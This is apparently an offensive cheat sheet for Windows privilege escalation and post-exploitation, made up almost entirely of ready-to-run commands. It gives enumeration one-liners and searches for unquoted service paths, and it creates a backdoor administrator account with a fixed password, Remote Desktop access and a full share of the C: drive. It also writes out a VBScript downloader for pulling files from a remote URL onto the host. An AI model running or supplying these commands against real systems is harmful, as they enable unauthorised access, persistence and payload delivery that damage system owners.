Enumeration

  • General information:
net config Workstation & hostname & net users & set
  • System information:
systeminfo
  • Precise version:
type C:/Windows/system32/eula.txt
  • Network information:
netstat -ano | findstr "LISTEN" & ipconfig /all & arp -A & route print
  • Firewall information:
netsh firewall show state & netsh firewall show config
  • Scheduled tasks:
schtasks /query /fo LIST /v | findstr /B /C:"HostName" /C:"TaskName" /C:"Next Run Time" /C:"Run As User" /C:"Comment" /C:"Author"
  • Services:
wmic service list brief
tasklist /svc
net start
  • Quotation glitch in services (missing quotes) (use this if already Administrator):
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
  • Otherwise, find missing quotes manually:
sc query
sc qc 
  • Missing autorun files (using Windows Sysinternals Autoruns):
autorunsc.exe -a | findstr /n /R "File\ not\ found"

User Creation

  • Add a new user, add them to the Administrators and RDP user localgroups:
net user /add snz Password123
net localgroup administrators snz /add
net localgroup "Remote Desktop Users" snz /add
net share SNZ=c:\ /grant:snz,full
  • Same as above, but one line:
net user /add snz Password123 & net localgroup administrators snz /add & net localgroup "Remote Desktop Users" snz /add & net share SNZ=c:\ /grant:snz,full

Tools / Exploits

python windows-exploit-suggester.py -d 2020-12-12-mssb.xls -i systeminfo.txt
  • Wget script for Windows:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs